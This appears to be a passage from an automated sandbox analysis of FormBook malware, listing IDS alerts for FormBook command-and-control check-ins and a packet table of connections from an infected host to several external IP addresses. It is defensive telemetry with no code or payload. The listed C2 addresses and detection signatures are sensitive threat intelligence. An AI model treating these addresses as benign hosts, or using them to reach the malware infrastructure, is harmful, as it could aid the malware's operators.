                                                            2025-01-11T05:43:57.983996+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1049985194.58.112.17480TCP
                                                            2025-01-11T05:44:04.341308+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049986134.122.191.18780TCP
                                                            2025-01-11T05:44:06.880750+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049987134.122.191.18780TCP
                                                            2025-01-11T05:44:09.419966+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049988134.122.191.18780TCP
                                                            2025-01-11T05:44:11.998202+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1049989134.122.191.18780TCP
                                                            2025-01-11T05:44:11.998202+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1049989134.122.191.18780TCP
                                                            2025-01-11T05:44:18.744320+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049990156.234.28.10180TCP
                                                            2025-01-11T05:44:21.251999+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049991156.234.28.10180TCP
                                                            2025-01-11T05:44:23.801868+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049992156.234.28.10180TCP
                                                            2025-01-11T05:44:26.355978+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1049993156.234.28.10180TCP
                                                            2025-01-11T05:44:26.355978+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1049993156.234.28.10180TCP
                                                            2025-01-11T05:44:32.134900+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049994209.74.79.4280TCP
                                                            2025-01-11T05:44:34.685203+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049995209.74.79.4280TCP
                                                            2025-01-11T05:44:37.239559+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049996209.74.79.4280TCP
                                                            2025-01-11T05:44:39.808998+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1049997209.74.79.4280TCP
                                                            2025-01-11T05:44:39.808998+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1049997209.74.79.4280TCP
                                                            2025-01-11T05:44:45.380494+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049998208.91.197.2780TCP
                                                            2025-01-11T05:44:47.931578+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049999208.91.197.2780TCP
                                                            2025-01-11T05:44:50.517452+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050000208.91.197.2780TCP
                                                            2025-01-11T05:44:53.598421+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1050001208.91.197.2780TCP
                                                            2025-01-11T05:44:53.598421+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1050001208.91.197.2780TCP
                                                            2025-01-11T05:44:59.537534+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050002185.101.158.11380TCP
                                                            2025-01-11T05:45:02.166501+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050003185.101.158.11380TCP
                                                            2025-01-11T05:45:04.796710+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050004185.101.158.11380TCP
                                                            2025-01-11T05:45:07.352230+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1050005185.101.158.11380TCP
                                                            2025-01-11T05:45:07.352230+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1050005185.101.158.11380TCP
                                                            2025-01-11T05:45:13.012282+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050006104.21.48.23380TCP
                                                            2025-01-11T05:45:15.558939+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050007104.21.48.23380TCP
                                                            2025-01-11T05:45:18.139702+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050008104.21.48.23380TCP
                                                            2025-01-11T05:45:20.654742+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1050009104.21.48.23380TCP
                                                            2025-01-11T05:45:20.654742+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1050009104.21.48.23380TCP
                                                            2025-01-11T05:45:26.366691+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.10500103.252.97.8680TCP
                                                            2025-01-11T05:45:29.508511+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.10500113.252.97.8680TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 11, 2025 05:43:25.294862032 CET4998080192.168.2.10104.21.86.111
                                                            Jan 11, 2025 05:43:25.299866915 CET8049980104.21.86.111192.168.2.10
                                                            Jan 11, 2025 05:43:25.299966097 CET4998080192.168.2.10104.21.86.111
                                                            Jan 11, 2025 05:43:25.310283899 CET4998080192.168.2.10104.21.86.111
                                                            Jan 11, 2025 05:43:25.315222025 CET8049980104.21.86.111192.168.2.10
                                                            Jan 11, 2025 05:43:26.279676914 CET8049980104.21.86.111192.168.2.10
                                                            Jan 11, 2025 05:43:26.279706001 CET8049980104.21.86.111192.168.2.10
                                                            Jan 11, 2025 05:43:26.279884100 CET4998080192.168.2.10104.21.86.111
                                                            Jan 11, 2025 05:43:26.280705929 CET8049980104.21.86.111192.168.2.10
                                                            Jan 11, 2025 05:43:26.280752897 CET4998080192.168.2.10104.21.86.111
                                                            Jan 11, 2025 05:43:26.283761024 CET4998080192.168.2.10104.21.86.111
                                                            Jan 11, 2025 05:43:26.288578987 CET8049980104.21.86.111192.168.2.10
                                                            Jan 11, 2025 05:43:49.620644093 CET4998280192.168.2.10194.58.112.174
                                                            Jan 11, 2025 05:43:49.625396967 CET8049982194.58.112.174192.168.2.10
                                                            Jan 11, 2025 05:43:49.625473976 CET4998280192.168.2.10194.58.112.174
                                                            Jan 11, 2025 05:43:49.641447067 CET4998280192.168.2.10194.58.112.174
                                                            Jan 11, 2025 05:43:49.646383047 CET8049982194.58.112.174192.168.2.10
                                                            Jan 11, 2025 05:43:50.307732105 CET8049982194.58.112.174192.168.2.10
                                                            Jan 11, 2025 05:43:50.307830095 CET8049982194.58.112.174192.168.2.10
                                                            Jan 11, 2025 05:43:50.308034897 CET4998280192.168.2.10194.58.112.174
                                                            Jan 11, 2025 05:43:51.147043943 CET4998280192.168.2.10194.58.112.174
                                                            Jan 11, 2025 05:43:52.165465117 CET4998380192.168.2.10194.58.112.174
                                                            Jan 11, 2025 05:43:52.170367002 CET8049983194.58.112.174192.168.2.10
                                                            Jan 11, 2025 05:43:52.170461893 CET4998380192.168.2.10194.58.112.174
                                                            Jan 11, 2025 05:43:52.186640024 CET4998380192.168.2.10194.58.112.174
                                                            Jan 11, 2025 05:43:52.191454887 CET8049983194.58.112.174192.168.2.10
                                                            Jan 11, 2025 05:43:52.866033077 CET8049983194.58.112.174192.168.2.10
                                                            Jan 11, 2025 05:43:52.866200924 CET8049983194.58.112.174192.168.2.10
                                                            Jan 11, 2025 05:43:52.866259098 CET4998380192.168.2.10194.58.112.174
                                                            Jan 11, 2025 05:43:53.693404913 CET4998380192.168.2.10194.58.112.174
                                                            Jan 11, 2025 05:43:54.714668036 CET4998480192.168.2.10194.58.112.174
                                                            Jan 11, 2025 05:43:54.719542027 CET8049984194.58.112.174192.168.2.10
                                                            Jan 11, 2025 05:43:54.719644070 CET4998480192.168.2.10194.58.112.174
                                                            Jan 11, 2025 05:43:54.740983009 CET4998480192.168.2.10194.58.112.174
                                                            Jan 11, 2025 05:43:54.745800018 CET8049984194.58.112.174192.168.2.10
                                                            Jan 11, 2025 05:43:54.745922089 CET8049984194.58.112.174192.168.2.10
                                                            Jan 11, 2025 05:43:55.424272060 CET8049984194.58.112.174192.168.2.10
                                                            Jan 11, 2025 05:43:55.424298048 CET8049984194.58.112.174192.168.2.10
                                                            Jan 11, 2025 05:43:55.424623966 CET4998480192.168.2.10194.58.112.174
                                                            Jan 11, 2025 05:43:56.256057978 CET4998480192.168.2.10194.58.112.174
                                                            Jan 11, 2025 05:43:57.275044918 CET4998580192.168.2.10194.58.112.174
                                                            Jan 11, 2025 05:43:57.280011892 CET8049985194.58.112.174192.168.2.10
                                                            Jan 11, 2025 05:43:57.280172110 CET4998580192.168.2.10194.58.112.174
                                                            Jan 11, 2025 05:43:57.289916992 CET4998580192.168.2.10194.58.112.174
                                                            Jan 11, 2025 05:43:57.295229912 CET8049985194.58.112.174192.168.2.10
                                                            Jan 11, 2025 05:43:57.983772993 CET8049985194.58.112.174192.168.2.10
                                                            Jan 11, 2025 05:43:57.983815908 CET8049985194.58.112.174192.168.2.10
                                                            Jan 11, 2025 05:43:57.983995914 CET4998580192.168.2.10194.58.112.174
                                                            Jan 11, 2025 05:43:57.987011909 CET4998580192.168.2.10194.58.112.174
                                                            Jan 11, 2025 05:43:57.991816998 CET8049985194.58.112.174192.168.2.10
                                                            Jan 11, 2025 05:44:03.401520014 CET4998680192.168.2.10134.122.191.187
                                                            Jan 11, 2025 05:44:03.406394958 CET8049986134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:03.406611919 CET4998680192.168.2.10134.122.191.187
                                                            Jan 11, 2025 05:44:03.421796083 CET4998680192.168.2.10134.122.191.187
                                                            Jan 11, 2025 05:44:03.426620960 CET8049986134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:04.341135025 CET8049986134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:04.341156960 CET8049986134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:04.341166019 CET8049986134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:04.341171026 CET8049986134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:04.341178894 CET8049986134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:04.341308117 CET4998680192.168.2.10134.122.191.187
                                                            Jan 11, 2025 05:44:04.928163052 CET4998680192.168.2.10134.122.191.187
                                                            Jan 11, 2025 05:44:05.946870089 CET4998780192.168.2.10134.122.191.187
                                                            Jan 11, 2025 05:44:05.953711987 CET8049987134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:05.953846931 CET4998780192.168.2.10134.122.191.187
                                                            Jan 11, 2025 05:44:05.968800068 CET4998780192.168.2.10134.122.191.187
                                                            Jan 11, 2025 05:44:05.973869085 CET8049987134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:06.880609035 CET8049987134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:06.880630970 CET8049987134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:06.880644083 CET8049987134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:06.880660057 CET8049987134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:06.880671024 CET8049987134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:06.880749941 CET4998780192.168.2.10134.122.191.187
                                                            Jan 11, 2025 05:44:06.880791903 CET4998780192.168.2.10134.122.191.187
                                                            Jan 11, 2025 05:44:07.474948883 CET4998780192.168.2.10134.122.191.187
                                                            Jan 11, 2025 05:44:08.501830101 CET4998880192.168.2.10134.122.191.187
                                                            Jan 11, 2025 05:44:08.506696939 CET8049988134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:08.506777048 CET4998880192.168.2.10134.122.191.187
                                                            Jan 11, 2025 05:44:08.523514986 CET4998880192.168.2.10134.122.191.187
                                                            Jan 11, 2025 05:44:08.528435946 CET8049988134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:08.528467894 CET8049988134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:09.419831038 CET8049988134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:09.419848919 CET8049988134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:09.419859886 CET8049988134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:09.419919014 CET8049988134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:09.419929981 CET8049988134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:09.419941902 CET8049988134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:09.419965982 CET4998880192.168.2.10134.122.191.187
                                                            Jan 11, 2025 05:44:09.420025110 CET4998880192.168.2.10134.122.191.187
                                                            Jan 11, 2025 05:44:10.037436962 CET4998880192.168.2.10134.122.191.187
                                                            Jan 11, 2025 05:44:11.056406975 CET4998980192.168.2.10134.122.191.187
                                                            Jan 11, 2025 05:44:11.061378002 CET8049989134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:11.061467886 CET4998980192.168.2.10134.122.191.187
                                                            Jan 11, 2025 05:44:11.070925951 CET4998980192.168.2.10134.122.191.187
                                                            Jan 11, 2025 05:44:11.075753927 CET8049989134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:11.998029947 CET8049989134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:11.998055935 CET8049989134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:11.998064995 CET8049989134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:11.998155117 CET8049989134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:11.998164892 CET8049989134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:11.998202085 CET4998980192.168.2.10134.122.191.187
                                                            Jan 11, 2025 05:44:11.998248100 CET4998980192.168.2.10134.122.191.187
                                                            Jan 11, 2025 05:44:12.003252983 CET4998980192.168.2.10134.122.191.187
                                                            Jan 11, 2025 05:44:12.008052111 CET8049989134.122.191.187192.168.2.10
                                                            Jan 11, 2025 05:44:17.838488102 CET4999080192.168.2.10156.234.28.101
                                                            Jan 11, 2025 05:44:17.843420029 CET8049990156.234.28.101192.168.2.10
                                                            Jan 11, 2025 05:44:17.843517065 CET4999080192.168.2.10156.234.28.101
                                                            Jan 11, 2025 05:44:17.858517885 CET4999080192.168.2.10156.234.28.101
                                                            Jan 11, 2025 05:44:17.863384008 CET8049990156.234.28.101192.168.2.10
                                                            Jan 11, 2025 05:44:18.744225979 CET8049990156.234.28.101192.168.2.10
                                                            Jan 11, 2025 05:44:18.744271040 CET8049990156.234.28.101192.168.2.10
                                                            Jan 11, 2025 05:44:18.744319916 CET4999080192.168.2.10156.234.28.101
                                                            Jan 11, 2025 05:44:19.365825891 CET4999080192.168.2.10156.234.28.101
                                                            Jan 11, 2025 05:44:20.386445999 CET4999180192.168.2.10156.234.28.101
                                                            Jan 11, 2025 05:44:20.391383886 CET8049991156.234.28.101192.168.2.10
                                                            Jan 11, 2025 05:44:20.391472101 CET4999180192.168.2.10156.234.28.101
                                                            Jan 11, 2025 05:44:20.408540010 CET4999180192.168.2.10156.234.28.101
                                                            Jan 11, 2025 05:44:20.413414001 CET8049991156.234.28.101192.168.2.10
                                                            Jan 11, 2025 05:44:21.251699924 CET8049991156.234.28.101192.168.2.10
                                                            Jan 11, 2025 05:44:21.251831055 CET8049991156.234.28.101192.168.2.10
                                                            Jan 11, 2025 05:44:21.251998901 CET4999180192.168.2.10156.234.28.101
                                                            Jan 11, 2025 05:44:21.912888050 CET4999180192.168.2.10156.234.28.101
                                                            Jan 11, 2025 05:44:22.931843042 CET4999280192.168.2.10156.234.28.101
                                                            Jan 11, 2025 05:44:22.936858892 CET8049992156.234.28.101192.168.2.10
                                                            Jan 11, 2025 05:44:22.940037966 CET4999280192.168.2.10156.234.28.101
                                                            Jan 11, 2025 05:44:22.952580929 CET4999280192.168.2.10156.234.28.101
                                                            Jan 11, 2025 05:44:22.957495928 CET8049992156.234.28.101192.168.2.10
                                                            Jan 11, 2025 05:44:22.957652092 CET8049992156.234.28.101192.168.2.10
                                                            Jan 11, 2025 05:44:23.801690102 CET8049992156.234.28.101192.168.2.10
                                                            Jan 11, 2025 05:44:23.801767111 CET8049992156.234.28.101192.168.2.10
                                                            Jan 11, 2025 05:44:23.801867962 CET4999280192.168.2.10156.234.28.101
                                                            Jan 11, 2025 05:44:24.459728956 CET4999280192.168.2.10156.234.28.101
                                                            Jan 11, 2025 05:44:25.478332996 CET4999380192.168.2.10156.234.28.101
                                                            Jan 11, 2025 05:44:25.483536005 CET8049993156.234.28.101192.168.2.10
                                                            Jan 11, 2025 05:44:25.483658075 CET4999380192.168.2.10156.234.28.101
                                                            Jan 11, 2025 05:44:25.492981911 CET4999380192.168.2.10156.234.28.101
                                                            Jan 11, 2025 05:44:25.497930050 CET8049993156.234.28.101192.168.2.10
                                                            Jan 11, 2025 05:44:26.355679989 CET8049993156.234.28.101192.168.2.10
                                                            Jan 11, 2025 05:44:26.355731964 CET8049993156.234.28.101192.168.2.10
                                                            Jan 11, 2025 05:44:26.355978012 CET4999380192.168.2.10156.234.28.101
                                                            Jan 11, 2025 05:44:26.356106043 CET8049993156.234.28.101192.168.2.10
                                                            Jan 11, 2025 05:44:26.356165886 CET4999380192.168.2.10156.234.28.101
                                                            Jan 11, 2025 05:44:26.359023094 CET4999380192.168.2.10156.234.28.101
                                                            Jan 11, 2025 05:44:26.364905119 CET8049993156.234.28.101192.168.2.10
                                                            Jan 11, 2025 05:44:31.527659893 CET4999480192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:31.533731937 CET8049994209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:31.533827066 CET4999480192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:31.547996998 CET4999480192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:31.553024054 CET8049994209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:32.134721994 CET8049994209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:32.134809017 CET8049994209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:32.134900093 CET4999480192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:33.053495884 CET4999480192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:34.072626114 CET4999580192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:34.077451944 CET8049995209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:34.077549934 CET4999580192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:34.092087984 CET4999580192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:34.096899986 CET8049995209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:34.685017109 CET8049995209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:34.685137987 CET8049995209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:34.685203075 CET4999580192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:35.600577116 CET4999580192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:36.621793032 CET4999680192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:36.629745960 CET8049996209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:36.629816055 CET4999680192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:36.645860910 CET4999680192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:36.650692940 CET8049996209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:36.650794983 CET8049996209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:37.239341021 CET8049996209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:37.239450932 CET8049996209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:37.239558935 CET4999680192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:38.147376060 CET4999680192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:39.166574001 CET4999780192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:39.172372103 CET8049997209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:39.172508955 CET4999780192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:39.181746006 CET4999780192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:39.186603069 CET8049997209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:39.808773041 CET8049997209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:39.808907032 CET8049997209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:39.808998108 CET4999780192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:39.812061071 CET4999780192.168.2.10209.74.79.42
                                                            Jan 11, 2025 05:44:39.816981077 CET8049997209.74.79.42192.168.2.10
                                                            Jan 11, 2025 05:44:44.833189964 CET4999880192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:44.838160992 CET8049998208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:44.838257074 CET4999880192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:44.854197025 CET4999880192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:44.859468937 CET8049998208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:45.375504017 CET8049998208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:45.380494118 CET4999880192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:46.366306067 CET4999880192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:46.371143103 CET8049998208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:47.390352964 CET4999980192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:47.395260096 CET8049999208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:47.395327091 CET4999980192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:47.410501957 CET4999980192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:47.415381908 CET8049999208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:47.931416035 CET8049999208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:47.931577921 CET4999980192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:48.913245916 CET4999980192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:48.918148041 CET8049999208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:49.990772009 CET5000080192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:49.995971918 CET8050000208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:49.996073961 CET5000080192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:50.028844118 CET5000080192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:50.033823013 CET8050000208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:50.033886909 CET8050000208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:50.517304897 CET8050000208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:50.517452002 CET5000080192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:51.538378000 CET5000080192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:51.543384075 CET8050000208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:52.603261948 CET5000180192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:52.608258009 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:52.608359098 CET5000180192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:52.692398071 CET5000180192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:52.697262049 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.598170042 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.598210096 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.598247051 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.598283052 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.598316908 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.598421097 CET5000180192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:53.598464966 CET5000180192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:53.599433899 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.599472046 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.599483967 CET5000180192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:53.599550962 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.599592924 CET5000180192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:53.599693060 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.599729061 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.599771976 CET5000180192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:53.604747057 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.604784012 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.604871988 CET5000180192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:53.642000914 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.642035007 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.642230034 CET5000180192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:53.683725119 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.683758020 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.683793068 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.683828115 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.683859110 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:53.683909893 CET5000180192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:53.683948994 CET5000180192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:53.688215017 CET5000180192.168.2.10208.91.197.27
                                                            Jan 11, 2025 05:44:53.693046093 CET8050001208.91.197.27192.168.2.10
                                                            Jan 11, 2025 05:44:58.845544100 CET5000280192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:44:58.850517988 CET8050002185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:44:58.850641966 CET5000280192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:44:58.866154909 CET5000280192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:44:58.871268034 CET8050002185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:44:59.537334919 CET8050002185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:44:59.537467003 CET8050002185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:44:59.537533998 CET5000280192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:00.382103920 CET5000280192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:01.404889107 CET5000380192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:01.409934044 CET8050003185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:01.410093069 CET5000380192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:01.563301086 CET5000380192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:01.568233013 CET8050003185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:02.166234970 CET8050003185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:02.166431904 CET8050003185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:02.166501045 CET5000380192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:03.085222960 CET5000380192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:04.105010986 CET5000480192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:04.109999895 CET8050004185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:04.110110998 CET5000480192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:04.126224995 CET5000480192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:04.131016016 CET8050004185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:04.131227016 CET8050004185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:04.796638966 CET8050004185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:04.796677113 CET8050004185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:04.796710014 CET5000480192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:05.632210970 CET5000480192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:06.650481939 CET5000580192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:06.655606985 CET8050005185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:06.655756950 CET5000580192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:06.666766882 CET5000580192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:06.671665907 CET8050005185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:07.352046013 CET8050005185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:07.352071047 CET8050005185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:07.352086067 CET8050005185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:07.352098942 CET8050005185.101.158.113192.168.2.10
                                                            Jan 11, 2025 05:45:07.352230072 CET5000580192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:07.352328062 CET5000580192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:07.355241060 CET5000580192.168.2.10185.101.158.113
                                                            Jan 11, 2025 05:45:07.360043049 CET8050005185.101.158.113192.168.2.10
